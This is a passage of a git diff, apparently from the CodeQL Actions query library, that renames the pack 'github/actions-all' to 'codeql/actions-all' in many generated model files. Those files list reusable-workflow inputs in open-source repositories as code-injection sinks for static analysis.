a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml index f0daee8757e..6d4259a45e5 100644 --- a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["remix-run/remix/.github/workflows/stacks.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml index 85d3b564a78..35d6bbd1b7b 100644 --- a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "input.version_override", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml index 01bda56c9a9..9dd893ca3b2 100644 --- a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "input.total-shard", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml index 4c9e9b1dc8f..10dfdc0c63e 100644 --- a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "input.prerel_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml index 30e54f94fc1..fdc59aeb23d 100644 --- a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.target_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml index bb0c172bf0e..4b520ea3954 100644 --- a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "input.daisyuiversion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml index 3a5ad21b22a..f8630968c45 100644 --- a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.stage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml index c161072bd3d..4cf11f56fdf 100644 --- a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "input.constraints", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml index 0362312f27a..44ad4f73076 100644 --- a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "input.job_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml index 2ae5aab3b2c..4d7af646901 100644 --- a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml index e2c8ae625c2..0f525b14607 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.latest", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml index 13461b60205..fc96f1497e0 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.ignore_test_status", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml index 88e02dd04c4..a57f0a86069 100644 --- a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "input.package_installation_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml index 2f368497f01..ce86ebf4911 100644 --- a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml index 64f3c208540..05212ab3264 100644 --- a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "input.option", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml index 9c2d7a421db..6d40d72d019 100644 --- a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "input.commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml index 1410fd6fbe9..f5ac697360b 100644 --- a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml index eca441b608a..95140465bfc 100644 --- a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "input.verSion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml index 2868aecd064..30cf3f54a2f 100644 --- a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml index 0aa2d1c596c..90937f50a3f 100644 --- a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.marks", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml index 02fe1b2055f..ec6a7385187 100644 --- a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "input.pull_request_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml index 9f6401ec03e..5079e80e761 100644 --- a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.patch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml index 373b507f2f3..ccaf2628951 100644 --- a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "input.patch_path", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml", "*", "input.ref", "output.ref", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml index 9b68b660586..56344ff35b6 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["supabase/auth/.github/workflows/publish.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml index ddce9773100..f2b4cd4eff3 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "input.image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml index 3aa599e00d7..f38f0d43c4c 100644 --- a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "input.workflow_run", "code-injection", "generated"] @@ -8,7 +8,7 @@ extensions: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "code-injection", "generated"] - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "output.pull_request_head_sha", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml index 4ff3377e6eb..85e61e866dc 100644 --- a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.map", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml index 577ffa78d82..9f984f488f7 100644 --- a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "input.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml index 99ff06a4aee..f13f9b87114 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml index 5241bc1bcb1..b021069745f 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "input.asan", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml index 66221185cbd..dae9a68727e 100644 --- a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml index eb5207528d4..4ea3849560d 100644 --- a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "input.crate", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml index 1337b0e76ec..ff4b4ccf353 100644 --- a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "input.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml index 1d8b8f0e9f1..d3649a5ebf3 100644 --- a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.framework", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml index 4eaa610a3a2..22ff2d5a29b 100644 --- a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "input.pytest_markers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml index a62139e12c4..f151d0a2c20 100644 --- a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.pace", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml index 2f3f85fe424..e08f9de2297 100644 --- a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.server_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml index f39a027eda7..fc009bce95a 100644 --- a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "input.hz", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml index 5a0b692e4e1..5e5870c64c7 100644 --- a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "input.workspace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml index ae902cb95ab..2262cf5115f 100644 --- a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml index 78379dd7796..a18ef96e87e 100644 --- a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml index 0eeed9a1f17..2ea0842c72b 100644 --- a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml index 3ab501e1b1f..65f027175b2 100644 --- a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.profile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml index caa0ee6d7cb..14c3c8378c6 100644 --- a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.excludePackages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml index b660b0bc4ec..c1a51cefdcd 100644 --- a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "input.tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml index 0fe5470bb11..c9b7394f044 100644 --- a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.build-arguments", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml index a9cd5759cf2..36c50c6ad50 100644 --- a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml index 5b0dc5da53d..fc0607380ff 100644 --- a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "input.config_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml index c90d1ac8afb..122a61c76fb 100644 --- a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml +++ 